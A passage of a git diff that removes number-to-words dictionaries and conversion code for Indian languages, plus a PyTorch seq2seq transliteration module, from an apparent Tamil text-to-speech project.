"ଛୟାଅଶୀ", - "87": "ସତାଅଶୀ", - "88": "ଅଠାଅଶୀ", - "89": "ଅଣାନବେ", - "90": "ନବେ", - "91": "ଏକାନବେ", - "92": "ବୟାନବେ", - "93": "ତେୟାନବେ", - "94": "ଚଉରାନବେ", - "95": "ପଞ୍ଚାନବେ", - "96": "ଛୟାନବେ", - "97": "ସତାନବେ", - "98": "ଅଠାନବେ", - "99": "ଅନେଶତ", - "100": "ଶହେ", - "1000": "ହଜାର", - "100000": "ଲକ୍ଷ", - "10000000": "କୋଟି", - "1000000000": "କୋଟି", -} # Oriya -num_dict["pa"] = { - "0": "ਸਿਫਰ ", - "1": "ਇੱਕ", - "2": "ਦੋ", - "3": "ਤਿੰਨ", - "4": "ਚਾਰ", - "5": "ਪੰਜ", - "6": "ਛੇ", - "7": "ਸੱਤ", - "8": "ਅੱਠ", - "9": "ਨੌਂ", - "10": "ਦੱਸ", - "11": "ਗਿਆਰਾਂ", - "12": "ਬਾਰਾਂ", - "13": "ਤੇਰਾਂ", - "14": "ਚੌਦਾਂ", - "15": "ਪੰਦਰਾਂ", - "16": "ਸੋਲ਼ਾਂ", - "17": "ਸਤਾਰਾਂ", - "18": "ਅਠਾਰਾਂ", - "19": "ਉਨੀ", - "20": "ਵੀਹ", - "21": "ਇੱਕੀ", - "22": "ਬਾਈ", - "23": "ਤੇਈ", - "24": "ਚੌਵੀ", - "25": "ਪੰਝੀ", - "26": "ਛੱਬੀ", - "27": "ਸਤਾਈ", - "28": "ਅਠਾਈ", - "29": "ਉਨੱਤੀ", - "30": "ਤੀਹ", - "31": "ਇਕੱਤੀ", - "32": "ਬੱਤੀ", - "33": "ਤੇਤੀ", - "34": "ਚੌਂਤੀ", - "35": "ਪੈਂਤੀ", - "36": "ਛੱਤੀ", - "37": "ਸੈਂਤੀ", - "38": "ਅਠੱਤੀ", - "39": 
"ਉਨਤਾਲੀ", - "40": "ਚਾਲੀ", - "41": "ਇਕਤਾਲੀ", - "42": "ਬਤਾਲੀ", - "43": "ਤਰਤਾਲੀ", - "44": "ਚੌਤਾਲੀ", - "45": "ਪੰਜਤਾਲੀ", - "46": "ਛਿਆਲੀ", - "47": "ਸੰਤਾਲੀ", - "48": "ਅੱਠਤਾਲੀ", - "49": "ਉਣਿੰਜਾ", - "50": "ਪੰਜਾਹ", - "51": "ਇਕਵਿੰਜਾ", - "52": "ਬਵਿੰਜਾ", - "53": "ਤਰਵਿੰਜਾ", - "54": "ਚਰਿੰਜਾ", - "55": "ਪਚਵਿੰਜਾ", - "56": "ਛਪਿੰਜਾ", - "57": "ਸਤਵਿੰਜਾ", - "58": "ਅੱਠਵਿੰਜਾ", - "59": "ਉਣਾਠ", - "60": "ਸੱਠ", - "61": "ਇਕਾਠ", - "62": "ਬਾਠ੍ਹ", - "63": "ਤਰੇਠ੍ਹ", - "64": "ਚੌਠ੍ਹ", - "65": "ਪੈਂਠ", - "66": "ਛਿਆਠ", - "67": "ਸਤਾਹਠ", - "68": "ਅੱਠਾਠ", - "69": "ਉਣੱਤਰ", - "70": "ਸੱਤਰ", - "71": "ਇਕ੍ਹੱਤਰ", - "72": "ਬਹੱਤਰ", - "73": "ਤਹੱਤਰ", - "74": "ਚੌਹੱਤਰ", - "75": "ਪੰਜੱਤਰ", - "76": "ਛਿਹੱਤਰ", - "77": "ਸਤੱਤਰ", - "78": "ਅਠੱਤਰ", - "79": "ਉਣਾਸੀ", - "80": "ਅੱਸੀ", - "81": "ਇਕਾਸੀ", - "82": "ਬਿਆਸੀ", - "83": "ਤਰਾਸੀ", - "84": "ਚਰਾਸੀ", - "85": "ਪੰਜਾਸੀ", - "86": "ਛਿਆਸੀ", - "87": "ਸਤਾਸੀ", - "88": "ਅਠਾਸੀ", - "89": "ਉਣਾਨਵੇਂ", - "90": "ਨੱਬੇ", - "91": "ਇਕਾਨਵੇਂ", - "92": "ਬਿਆਨਵੇਂ", - "93": "ਤਰਾਨਵੇਂ", - "94": "ਚਰਾਨਵੇਂ", - "95": "ਪਚਾਨਵੇਂ", - "96": "ਛਿਆਨਵੇਂ", - "97": "ਸਤਾਨਵੇਂ", - "98": "ਅਠਾਨਵੇਂ", - "99": "ਨਿੜਾਨਵੇਂ", - "100": "ਸੌ", - "1000": "ਹਜਾਰ", - "100000": "ਲੱਖ", - "10000000": "ਕਰੋੜ", - "1000000000": "ਅਰਬ", -} # Punjabi - -# --------------------------- num_to_word.py ------------------------------ -""" -Method to convert Numbers to Words -for indian languages - -Use cases:- -1) Speech recognition pre-processing -2) Language modeling Data pre-processing - -------------------------- -check indic_numbers.py to add support -for any indian language -""" - - -def language_specific_exception(words, lang, combiner): - """ - Language Specific Exception will come here - """ - - def occurs_at_end(piece): - return words[-len(piece) :] == piece - - if lang == "mr": - words = words.replace("एक" + combiner + "शे", "शंभर") - elif lang == "gu": - words = words.replace("બે" + combiner + "સો", "બસ્સો") - elif lang == "te": - exception_dict = { - "1": "ఒక", - "100": "వంద", - "100+": "వందలు", - "1000": "వెయ్యి", - "1000+": "వేలు", - "100000": "లక్ష", - "100000+": "లక్షలు", - "10000000": "కోటి", - "10000000+": "కోట్లు", - } - - test_case = ["100", "1000", "100000", "10000000"] - for test in test_case: - test_word = num_dict["te"][test] - match = num_dict["te"]["1"] + combiner + test_word - # for numbers like : 100, 1000, 100000 - if words == match: - return exception_dict[test] - # for numbers like : 200, 4000, 800000 - elif occurs_at_end(test_word): - words = words.replace(test_word, exception_dict[test + "+"]) - # for numbers like : 105, 1076, 123993 - elif not occurs_at_end(match): - replacement = exception_dict["1"] + combiner + exception_dict[test] - words = words.replace(match, replacement) - - # Exception case for 101...199 - special_case = "ఒక" + combiner + "వంద" - words = words.replace(special_case, "నూట") - elif lang == "kn": - # special case for 100 - if words == ("ಒಂದು" + combiner + "ನೂರ"): - return "ನೂರು" - exception_dict = { - "ನೂರ": "ನೂರು", - "ಸಾವಿರದ": "ಸಾವಿರ", - "ಲಕ್ಷದ": "ಲಕ್ಷ", - "ಕೋಟಿಯ": "ಕೋಟಿ", - } - for expt in exception_dict: - if occurs_at_end(expt): - words = words.replace(expt, exception_dict[expt]) - return words - - -def num_to_word(num, lang, separator=", ", combiner=" "): - """ - Main Method - :param num: Number digits from any indian language - :param lang: Language Code from supported Language - :param separator: Separator character i.e. separator = '-' --> 'two hundred-sixty' - :param combiner: combine number with position i.e. 
combiner = '-' --> 'two-hundred sixty' - :return: UTF-8 String of numbers in words - """ - lang = lang.lower() - num = str(num) - - # Load dictionary according to language code - assert lang in supported_lang, "Language not supported" - num_dic = num_dict[lang] - - # dash default combiner for english-india - if (lang == "en") & (combiner == " "): - combiner = "-" - - # Remove punctuations from numbers - num = str(num).replace(",", "").replace(" ", "") - - # Replace native language numbers with english digits - for language in supported_lang: - for num_index in range(10): - num = num.replace(all_num[language][num_index], all_num["en"][num_index]) - - # Assert that input contains only integer number - for digit in num: - assert digit in all_num["en"], "Give proper input" - - # Process - # For Number longer than 9 digits - def all_two_digit(digits_2): - if len(digits_2) <= 1: # Provided only one/zero digit - return num_dic.get(digits_2, "") - elif digits_2 == "00": # Two Zero provided - return num_dic["0"] + separator + num_dic["0"] - elif digits_2[0] == "0": # First digit is zero - return num_dic["0"] + separator + num_dic[digits_2[1]] - else: # Both digit provided - return num_dic[digits_2] - - # For Number less than 9 digits - def two_digit(digits_2): - digits_2 = digits_2.lstrip("0") - if len(digits_2) != 0: - return num_dic[digits_2] - else: - return "" - - def all_digit(digits): - digits = digits.lstrip("0") - digit_len = len(digits) - if digit_len > 3: - num_of_digits_to_process = (digit_len % 2) + 1 - process_digits = digits[:num_of_digits_to_process] - base = str(10 ** (int(digit_len / 2) * 2 - 1)) - remain_digits = digits[num_of_digits_to_process:] - return ( - num_dic[process_digits] - + combiner - + num_dic[base] - + separator - + all_digit(remain_digits) - ) - elif len(digits) == 3: - return ( - num_dic[digits[:1]] - + combiner - + num_dic["100"] - + separator - + two_digit(digits[1:]) - ) - else: - return two_digit(digits) - - num = num.lstrip("0") - full_digit_len = len(num) - - if full_digit_len == 0: - output = num_dic["0"] - elif full_digit_len <= 9: - output = all_digit(num) - else: - iteration = round(full_digit_len / 2) - output = all_two_digit(num[:2]) # First to digit - for i in range(1, iteration): - output = ( - output + separator + all_two_digit(num[i * 2 : (i + 1) * 2]) - ) # Next two digit pairs - remaining_digits = num[iteration * 2 :] - if not all_two_digit(remaining_digits) == "": - output = ( - output + separator + all_two_digit(remaining_digits) - ) # remaining Last one/two digits - - output = output.strip(separator) - - output = language_specific_exception(output, lang, combiner) - - return output - - -# --------------------------------- num_to_word_on_a_sent --------------------------------- - - -def is_digit(word, digit_pattern): - return re.search(digit_pattern, word) - - -def remove_punct(sent): - clean = re.sub("[%s]" % re.escape(string.punctuation), " ", sent) - return " ".join([word for word in clean.split() if word]) - - -def normalize_nums(text, lang): - """ - text: str (eg) - lang: lang code ['en', 'hi'] - - returns: str - (eg) - """ - - if lang in supported_lang: - words = text.split() - lang_digits = [str(i) for i in range(0, 10)] - - digit_pattern = "[" + "".join(lang_digits) + "]" - num_indices = [ - ind for ind, word in enumerate(words) if is_digit(word, digit_pattern) - ] - - words_up = [ - num_to_word(word, lang, separator=" ", combiner=" ") - if ind in num_indices - else word - for ind, word in enumerate(words) - ] - return " 
".join(words_up) - else: - return text - - -if __name__ == "__main__": - print(normalize_nums("रीटा के पास 16 बिल्लियाँ हैं।", "hi")) diff --git a/spaces/Harveenchadha/Vakyansh-Tamil-TTS/ttsv/tts_infer/transliterate.py b/spaces/Harveenchadha/Vakyansh-Tamil-TTS/ttsv/tts_infer/transliterate.py deleted file mode 100644 index 575430562683434cd44fd8d2e77d26dab9ced73b..0000000000000000000000000000000000000000 --- a/spaces/Harveenchadha/Vakyansh-Tamil-TTS/ttsv/tts_infer/transliterate.py +++ /dev/null @@ -1,919 +0,0 @@ -import torch -import torch.nn as nn -import numpy as np -import pandas as pd -import random -import sys -import os -import json -import enum -import traceback -import re - -F_DIR = os.path.dirname(os.environ.get('translit_model_base_path', os.path.realpath(__file__))) - - -class XlitError(enum.Enum): - lang_err = "Unsupported langauge ID requested ;( Please check available languages." - string_err = "String passed is incompatable ;(" - internal_err = "Internal crash ;(" - unknown_err = "Unknown Failure" - loading_err = "Loading failed ;( Check if metadata/paths are correctly configured." - - -##=================== Network ================================================== - - -class Encoder(nn.Module): - def __init__( - self, - input_dim, - embed_dim, - hidden_dim, - rnn_type="gru", - layers=1, - bidirectional=False, - dropout=0, - device="cpu", - ): - super(Encoder, self).__init__() - - self.input_dim = input_dim # src_vocab_sz - self.enc_embed_dim = embed_dim - self.enc_hidden_dim = hidden_dim - self.enc_rnn_type = rnn_type - self.enc_layers = layers - self.enc_directions = 2 if bidirectional else 1 - self.device = device - - self.embedding = nn.Embedding(self.input_dim, self.enc_embed_dim) - - if self.enc_rnn_type == "gru": - self.enc_rnn = nn.GRU( - input_size=self.enc_embed_dim, - hidden_size=self.enc_hidden_dim, - num_layers=self.enc_layers, - bidirectional=bidirectional, - ) - elif self.enc_rnn_type == "lstm": - self.enc_rnn = nn.LSTM( - input_size=self.enc_embed_dim, - hidden_size=self.enc_hidden_dim, - num_layers=self.enc_layers, - bidirectional=bidirectional, - ) - else: - raise Exception("XlitError: unknown RNN type mentioned") - - def forward(self, x, x_sz, hidden=None): - """ - x_sz: (batch_size, 1) - Unpadded sequence lengths used for pack_pad - """ - batch_sz = x.shape[0] - # x: batch_size, max_length, enc_embed_dim - x = self.embedding(x) - - ## pack the padded data - # x: max_length, batch_size, enc_embed_dim -> for pack_pad - x = x.permute(1, 0, 2) - x = nn.utils.rnn.pack_padded_sequence(x, x_sz, enforce_sorted=False) # unpad - - # output: packed_size, batch_size, enc_embed_dim - # hidden: n_layer**num_directions, batch_size, hidden_dim | if LSTM (h_n, c_n) - output, hidden = self.enc_rnn( - x - ) # gru returns hidden state of all timesteps as well as hidden state at last timestep - - ## pad the sequence to the max length in the batch - # output: max_length, batch_size, enc_emb_dim*directions) - output, _ = nn.utils.rnn.pad_packed_sequence(output) - - # output: batch_size, max_length, hidden_dim - output = output.permute(1, 0, 2) - - return output, hidden - - def get_word_embedding(self, x): - """ """ - x_sz = torch.tensor([len(x)]) - x_ = torch.tensor(x).unsqueeze(0).to(dtype=torch.long) - # x: 1, max_length, enc_embed_dim - x = self.embedding(x_) - - ## pack the padded data - # x: max_length, 1, enc_embed_dim -> for pack_pad - x = x.permute(1, 0, 2) - x = nn.utils.rnn.pack_padded_sequence(x, x_sz, enforce_sorted=False) # unpad - - # output: packed_size, 1, 
enc_embed_dim - # hidden: n_layer**num_directions, 1, hidden_dim | if LSTM (h_n, c_n) - output, hidden = self.enc_rnn( - x - ) # gru returns hidden state of all timesteps as well as hidden state at last timestep - - out_embed = hidden[0].squeeze() - - return out_embed - - -class Decoder(nn.Module): - def __init__( - self, - output_dim, - embed_dim, - hidden_dim, - rnn_type="gru", - layers=1, - use_attention=True, - enc_outstate_dim=None, # enc_directions * enc_hidden_dim - dropout=0, - device="cpu", - ): - super(Decoder, self).__init__() - - self.output_dim = output_dim # tgt_vocab_sz - self.dec_hidden_dim = hidden_dim - self.dec_embed_dim = embed_dim - self.dec_rnn_type = rnn_type - self.dec_layers = layers - self.use_attention = use_attention - self.device = device - if self.use_attention: - self.enc_outstate_dim = enc_outstate_dim if enc_outstate_dim else hidden_dim - else: - self.enc_outstate_dim = 0 - - self.embedding = nn.Embedding(self.output_dim, self.dec_embed_dim) - - if self.dec_rnn_type == "gru": - self.dec_rnn = nn.GRU( - input_size=self.dec_embed_dim - + self.enc_outstate_dim, # to concat attention_output - hidden_size=self.dec_hidden_dim, # previous Hidden - num_layers=self.dec_layers, - batch_first=True, - ) - elif self.dec_rnn_type == "lstm": - self.dec_rnn = nn.LSTM( - input_size=self.dec_embed_dim - + self.enc_outstate_dim, # to concat attention_output - hidden_size=self.dec_hidden_dim, # previous Hidden - num_layers=self.dec_layers, - batch_first=True, - ) - else: - raise Exception("XlitError: unknown RNN type mentioned") - - self.fc = nn.Sequential( - nn.Linear(self.dec_hidden_dim, self.dec_embed_dim), - nn.LeakyReLU(), - # nn.Linear(self.dec_embed_dim, self.dec_embed_dim), nn.LeakyReLU(), # removing to reduce size - nn.Linear(self.dec_embed_dim, self.output_dim), - ) - - ##----- Attention ---------- - if self.use_attention: - self.W1 = nn.Linear(self.enc_outstate_dim, self.dec_hidden_dim) - self.W2 = nn.Linear(self.dec_hidden_dim, self.dec_hidden_dim) - self.V = nn.Linear(self.dec_hidden_dim, 1) - - def attention(self, x, hidden, enc_output): - """ - x: (batch_size, 1, dec_embed_dim) -> after Embedding - enc_output: batch_size, max_length, enc_hidden_dim *num_directions - hidden: n_layers, batch_size, hidden_size | if LSTM (h_n, c_n) - """ - - ## perform addition to calculate the score - - # hidden_with_time_axis: batch_size, 1, hidden_dim - ## hidden_with_time_axis = hidden.permute(1, 0, 2) ## replaced with below 2lines - hidden_with_time_axis = ( - torch.sum(hidden, axis=0) - if self.dec_rnn_type != "lstm" - else torch.sum(hidden[0], axis=0) - ) # h_n - - hidden_with_time_axis = hidden_with_time_axis.unsqueeze(1) - - # score: batch_size, max_length, hidden_dim - score = torch.tanh(self.W1(enc_output) + self.W2(hidden_with_time_axis)) - - # attention_weights: batch_size, max_length, 1 - # we get 1 at the last axis because we are applying score to self.V - attention_weights = torch.softmax(self.V(score), dim=1) - - # context_vector shape after sum == (batch_size, hidden_dim) - context_vector = attention_weights * enc_output - context_vector = torch.sum(context_vector, dim=1) - # context_vector: batch_size, 1, hidden_dim - context_vector = context_vector.unsqueeze(1) - - # attend_out (batch_size, 1, dec_embed_dim + hidden_size) - attend_out = torch.cat((context_vector, x), -1) - - return attend_out, attention_weights - - def forward(self, x, hidden, enc_output): - """ - x: (batch_size, 1) - enc_output: batch_size, max_length, dec_embed_dim - hidden: n_layer, 
batch_size, hidden_size | lstm: (h_n, c_n) - """ - if (hidden is None) and (self.use_attention is False): - raise Exception( - "XlitError: No use of a decoder with No attention and No Hidden" - ) - - batch_sz = x.shape[0] - - if hidden is None: - # hidden: n_layers, batch_size, hidden_dim - hid_for_att = torch.zeros( - (self.dec_layers, batch_sz, self.dec_hidden_dim) - ).to(self.device) - elif self.dec_rnn_type == "lstm": - hid_for_att = hidden[1] # c_n - - # x (batch_size, 1, dec_embed_dim) -> after embedding - x = self.embedding(x) - - if self.use_attention: - # x (batch_size, 1, dec_embed_dim + hidden_size) -> after attention - # aw: (batch_size, max_length, 1) - x, aw = self.attention(x, hidden, enc_output) - else: - x, aw = x, 0 - - # passing the concatenated vector to the GRU - # output: (batch_size, n_layers, hidden_size) - # hidden: n_layers, batch_size, hidden_size | if LSTM (h_n, c_n) - output, hidden = ( - self.dec_rnn(x, hidden) if hidden is not None else self.dec_rnn(x) - ) - - # output :shp: (batch_size * 1, hidden_size) - output = output.view(-1, output.size(2)) - - # output :shp: (batch_size * 1, output_dim) - output = self.fc(output) - - return output, hidden, aw - - -class Seq2Seq(nn.Module): - """ - Class dependency: Encoder, Decoder - """ - - def __init__( - self, encoder, decoder, pass_enc2dec_hid=False, dropout=0, device="cpu" - ): - super(Seq2Seq, self).__init__() - - self.encoder = encoder - self.decoder = decoder - self.device = device - self.pass_enc2dec_hid = pass_enc2dec_hid - _force_en2dec_hid_conv = False - - if self.pass_enc2dec_hid: - assert ( - decoder.dec_hidden_dim == encoder.enc_hidden_dim - ), "Hidden Dimension of encoder and decoder must be same, or unset `pass_enc2dec_hid`" - if decoder.use_attention: - assert ( - decoder.enc_outstate_dim - == encoder.enc_directions * encoder.enc_hidden_dim - ), "Set `enc_out_dim` correctly in decoder" - assert ( - self.pass_enc2dec_hid or decoder.use_attention - ), "No use of a decoder with No attention and No Hidden from Encoder" - - self.use_conv_4_enc2dec_hid = False - if ( - self.pass_enc2dec_hid - and (encoder.enc_directions * encoder.enc_layers != decoder.dec_layers) - ) or _force_en2dec_hid_conv: - if encoder.enc_rnn_type == "lstm" or encoder.enc_rnn_type == "lstm": - raise Exception( - "XlitError: conv for enc2dec_hid not implemented; Change the layer numbers appropriately" - ) - - self.use_conv_4_enc2dec_hid = True - self.enc_hid_1ax = encoder.enc_directions * encoder.enc_layers - self.dec_hid_1ax = decoder.dec_layers - self.e2d_hidden_conv = nn.Conv1d(self.enc_hid_1ax, self.dec_hid_1ax, 1) - - def enc2dec_hidden(self, enc_hidden): - """ - enc_hidden: n_layer, batch_size, hidden_dim*num_directions - TODO: Implement the logic for LSTm bsed model - """ - # hidden: batch_size, enc_layer*num_directions, enc_hidden_dim - hidden = enc_hidden.permute(1, 0, 2).contiguous() - # hidden: batch_size, dec_layers, dec_hidden_dim -> [N,C,Tstep] - hidden = self.e2d_hidden_conv(hidden) - - # hidden: dec_layers, batch_size , dec_hidden_dim - hidden_for_dec = hidden.permute(1, 0, 2).contiguous() - - return hidden_for_dec - - def active_beam_inference(self, src, beam_width=3, max_tgt_sz=50): - """Search based decoding - src: (sequence_len) - """ - - def _avg_score(p_tup): - """Used for Sorting - TODO: Dividing by length of sequence power alpha as hyperparam - """ - return p_tup[0] - - import sys - - batch_size = 1 - start_tok = src[0] - end_tok = src[-1] - src_sz = torch.tensor([len(src)]) - src_ = src.unsqueeze(0) - - # 
enc_output: (batch_size, padded_seq_length, enc_hidden_dim*num_direction) - # enc_hidden: (enc_layers*num_direction, batch_size, hidden_dim) - enc_output, enc_hidden = self.encoder(src_, src_sz) - - if self.pass_enc2dec_hid: - # dec_hidden: dec_layers, batch_size , dec_hidden_dim - if self.use_conv_4_enc2dec_hid: - init_dec_hidden = self.enc2dec_hidden(enc_hidden) - else: - init_dec_hidden = enc_hidden - else: - # dec_hidden -> Will be initialized to zeros internally - init_dec_hidden = None - - # top_pred[][0] = Σ-log_softmax - # top_pred[][1] = sequence torch.tensor shape: (1) - # top_pred[][2] = dec_hidden - top_pred_list = [(0, start_tok.unsqueeze(0), init_dec_hidden)] - - for t in range(max_tgt_sz): - cur_pred_list = [] - - for p_tup in top_pred_list: - if p_tup[1][-1] == end_tok: - cur_pred_list.append(p_tup) - continue - - # dec_hidden: dec_layers, 1, hidden_dim - # dec_output: 1, output_dim - dec_output, dec_hidden, _ = self.decoder( - x=p_tup[1][-1].view(1, 1), # dec_input: (1,1) - hidden=p_tup[2], - enc_output=enc_output, - ) - - ## π{prob} = Σ{log(prob)} -> to prevent diminishing - # dec_output: (1, output_dim) - dec_output = nn.functional.log_softmax(dec_output, dim=1) - # pred_topk.values & pred_topk.indices: (1, beam_width) - pred_topk = torch.topk(dec_output, k=beam_width, dim=1) - - for i in range(beam_width): - sig_logsmx_ = p_tup[0] + pred_topk.values[0][i] - # seq_tensor_ : (seq_len) - seq_tensor_ = torch.cat((p_tup[1], pred_topk.indices[0][i].view(1))) - - cur_pred_list.append((sig_logsmx_, seq_tensor_, dec_hidden)) - - cur_pred_list.sort(key=_avg_score, reverse=True) # Maximized order - top_pred_list = cur_pred_list[:beam_width] - - # check if end_tok of all topk - end_flags_ = [1 if t[1][-1] == end_tok else 0 for t in top_pred_list] - if beam_width == sum(end_flags_): - break - - pred_tnsr_list = [t[1] for t in top_pred_list] - - return pred_tnsr_list - - -##===================== Glyph handlers ======================================= - - -class GlyphStrawboss: - def __init__(self, glyphs="en"): - """list of letters in a language in unicode - lang: ISO Language code - glyphs: json file with script information - """ - if glyphs == "en": - # Smallcase alone - self.glyphs = [chr(alpha) for alpha in range(97, 122 + 1)] - else: - self.dossier = json.load(open(glyphs, encoding="utf-8")) - self.glyphs = self.dossier["glyphs"] - self.numsym_map = self.dossier["numsym_map"] - - self.char2idx = {} - self.idx2char = {} - self._create_index() - - def _create_index(self): - - self.char2idx["_"] = 0 # pad - self.char2idx["$"] = 1 # start - self.char2idx["#"] = 2 # end - self.char2idx["*"] = 3 # Mask - self.char2idx["'"] = 4 # apostrophe U+0027 - self.char2idx["%"] = 5 # unused - self.char2idx["!"] = 6 # unused - - # letter to index mapping - for idx, char in enumerate(self.glyphs): - self.char2idx[char] = idx + 7 # +7 token initially - - # index to letter mapping - for char, idx in self.char2idx.items(): - self.idx2char[idx] = char - - def size(self): - return len(self.char2idx) - - def word2xlitvec(self, word): - """Converts given string of gyphs(word) to vector(numpy) - Also adds tokens for start and end - """ - try: - vec = [self.char2idx["$"]] # start token - for i in list(word): - vec.append(self.char2idx[i]) - vec.append(self.char2idx["#"]) # end token - - vec = np.asarray(vec, dtype=np.int64) - return vec - - except Exception as error: - print("XlitError: In word:", word, "Error Char not in Token:", error) - sys.exit() - - def xlitvec2word(self, vector): - """Converts 
vector(numpy) to string of glyphs(word)""" - char_list = [] - for i in vector: - char_list.append(self.idx2char[i]) - - word = "".join(char_list).replace("$", "").replace("#", "") # remove tokens - word = word.replace("_", "").replace("*", "") # remove tokens - return word - - -class VocabSanitizer: - def __init__(self, data_file): - """ - data_file: path to file conatining vocabulary list - """ - extension = os.path.splitext(data_file)[-1] - if extension == ".json": - self.vocab_set = set(json.load(open(data_file, encoding="utf-8"))) - elif extension == ".csv": - self.vocab_df = pd.read_csv(data_file).set_index("WORD") - self.vocab_set = set(self.vocab_df.index) - else: - print("XlitError: Only Json/CSV file extension supported") - - def reposition(self, word_list): - """Reorder Words in list""" - new_list = [] - temp_ = word_list.copy() - for v in word_list: - if v in self.vocab_set: - new_list.append(v) - temp_.remove(v) - new_list.extend(temp_) - - return new_list - - -##=============== INSTANTIATION ================================================ - - -class XlitPiston: - """ - For handling prediction & post-processing of transliteration for a single language - Class dependency: Seq2Seq, GlyphStrawboss, VocabSanitizer - Global Variables: F_DIR - """ - - def __init__( - self, - weight_path, - vocab_file, - tglyph_cfg_file, - iglyph_cfg_file="en", - device="cpu", - ): - - self.device = device - self.in_glyph_obj = GlyphStrawboss(iglyph_cfg_file) - self.tgt_glyph_obj = GlyphStrawboss(glyphs=tglyph_cfg_file) - self.voc_sanity = VocabSanitizer(vocab_file) - - self._numsym_set = set( - json.load(open(tglyph_cfg_file, encoding="utf-8"))["numsym_map"].keys() - ) - self._inchar_set = set("abcdefghijklmnopqrstuvwxyz") - self._natscr_set = set().union( - self.tgt_glyph_obj.glyphs, sum(self.tgt_glyph_obj.numsym_map.values(), []) - ) - - ## Model Config Static TODO: add defining in json support - input_dim = self.in_glyph_obj.size() - output_dim = self.tgt_glyph_obj.size() - enc_emb_dim = 300 - dec_emb_dim = 300 - enc_hidden_dim = 512 - dec_hidden_dim = 512 - rnn_type = "lstm" - enc2dec_hid = True - attention = True - enc_layers = 1 - dec_layers = 2 - m_dropout = 0 - enc_bidirect = True - enc_outstate_dim = enc_hidden_dim * (2 if enc_bidirect else 1) - - enc = Encoder( - input_dim=input_dim, - embed_dim=enc_emb_dim, - hidden_dim=enc_hidden_dim, - rnn_type=rnn_type, - layers=enc_layers, - dropout=m_dropout, - device=self.device, - bidirectional=enc_bidirect, - ) - dec = Decoder( - output_dim=output_dim, - embed_dim=dec_emb_dim, - hidden_dim=dec_hidden_dim, - rnn_type=rnn_type, - layers=dec_layers, - dropout=m_dropout, - use_attention=attention, - enc_outstate_dim=enc_outstate_dim, - device=self.device, - ) - self.model = Seq2Seq(enc, dec, pass_enc2dec_hid=enc2dec_hid, device=self.device) - self.model = self.model.to(self.device) - weights = torch.load(weight_path, map_location=torch.device(self.device)) - - self.model.load_state_dict(weights) - self.model.eval() - - def character_model(self, word, beam_width=1): - in_vec = torch.from_numpy(self.in_glyph_obj.word2xlitvec(word)).to(self.device) - ## change to active or passive beam - p_out_list = self.model.active_beam_inference(in_vec, beam_width=beam_width) - p_result = [ - self.tgt_glyph_obj.xlitvec2word(out.cpu().numpy()) for out in p_out_list - ] - - result = self.voc_sanity.reposition(p_result) - - # List type - return result - - def numsym_model(self, seg): - """tgt_glyph_obj.numsym_map[x] returns a list object""" - if len(seg) == 1: - return 
[seg] + self.tgt_glyph_obj.numsym_map[seg] - - a = [self.tgt_glyph_obj.numsym_map[n][0] for n in seg] - return [seg] + ["".join(a)] - - def _word_segementer(self, sequence): - - sequence = sequence.lower() - accepted = set().union(self._numsym_set, self._inchar_set, self._natscr_set) - # sequence = ''.join([i for i in sequence if i in accepted]) - - segment = [] - idx = 0 - seq_ = list(sequence) - while len(seq_): - # for Number-Symbol - temp = "" - while len(seq_) and seq_[0] in self._numsym_set: - temp += seq_[0] - seq_.pop(0) - if temp != "": - segment.append(temp) - - # for Target Chars - temp = "" - while len(seq_) and seq_[0] in self._natscr_set: - temp += seq_[0] - seq_.pop(0) - if temp != "": - segment.append(temp) - - # for Input-Roman Chars - temp = "" - while len(seq_) and seq_[0] in self._inchar_set: - temp += seq_[0] - seq_.pop(0) - if temp != "": - segment.append(temp) - - temp = "" - while len(seq_) and seq_[0] not in accepted: - temp += seq_[0] - seq_.pop(0) - if temp != "": - segment.append(temp) - - return segment - - def inferencer(self, sequence, beam_width=10): - - seg = self._word_segementer(sequence[:120]) - lit_seg = [] - - p = 0 - while p < len(seg): - if seg[p][0] in self._natscr_set: - lit_seg.append([seg[p]]) - p += 1 - - elif seg[p][0] in self._inchar_set: - lit_seg.append(self.character_model(seg[p], beam_width=beam_width)) - p += 1 - - elif seg[p][0] in self._numsym_set: # num & punc - lit_seg.append(self.numsym_model(seg[p])) - p += 1 - else: - lit_seg.append([seg[p]]) - p += 1 - - ## IF segment less/equal to 2 then return combinotorial, - ## ELSE only return top1 of each result concatenated - if len(lit_seg) == 1: - final_result = lit_seg[0] - - elif len(lit_seg) == 2: - final_result = [""] - for seg in lit_seg: - new_result = [] - for s in seg: - for f in final_result: - new_result.append(f + s) - final_result = new_result - - else: - new_result = [] - for seg in lit_seg: - new_result.append(seg[0]) - final_result = ["".join(new_result)] - - return final_result - - -from collections.abc import Iterable -from pydload import dload -import zipfile - -MODEL_DOWNLOAD_URL_PREFIX = "https://github.com/AI4Bharat/IndianNLP-Transliteration/releases/download/xlit_v0.5.0/" - - -def is_folder_writable(folder): - try: - os.makedirs(folder, exist_ok=True) - tmp_file = os.path.join(folder, ".write_test") - with open(tmp_file, "w") as f: - f.write("Permission Check") - os.remove(tmp_file) - return True - except: - return False - - -def is_directory_writable(path): - if os.name == "nt": - return is_folder_writable(path) - return os.access(path, os.W_OK | os.X_OK) - - -class XlitEngine: - """ - For Managing the top level tasks and applications of transliteration - Global Variables: F_DIR - """ - - def __init__( - self, lang2use="all", config_path="translit_models/default_lineup.json" - ): - - lineup = json.load(open(os.path.join(F_DIR, config_path), encoding="utf-8")) - self.lang_config = {} - if isinstance(lang2use, str): - if lang2use == "all": - self.lang_config = lineup - elif lang2use in lineup: - self.lang_config[lang2use] = lineup[lang2use] - else: - raise Exception( - "XlitError: The entered Langauge code not found. 
Available are {}".format( - lineup.keys() - ) - ) - - elif isinstance(lang2use, Iterable): - for l in lang2use: - try: - self.lang_config[l] = lineup[l] - except: - print( - "XlitError: Language code {} not found, Skipping...".format(l) - ) - else: - raise Exception( - "XlitError: lang2use must be a list of language codes (or) string of single language code" - ) - - if is_directory_writable(F_DIR): - models_path = os.path.join(F_DIR, "translit_models") - else: - user_home = os.path.expanduser("~") - models_path = os.path.join(user_home, ".AI4Bharat_Xlit_Models") - os.makedirs(models_path, exist_ok=True) - self.download_models(models_path) - - self.langs = {} - self.lang_model = {} - for la in self.lang_config: - try: - print("Loading {}...".format(la)) - self.lang_model[la] = XlitPiston( - weight_path=os.path.join( - models_path, self.lang_config[la]["weight"] - ), - vocab_file=os.path.join(models_path, self.lang_config[la]["vocab"]), - tglyph_cfg_file=os.path.join( - models_path, self.lang_config[la]["script"] - ), - iglyph_cfg_file="en", - ) - self.langs[la] = self.lang_config[la]["name"] - except Exception as error: - print("XlitError: Failure in loading {} \n".format(la), error) - 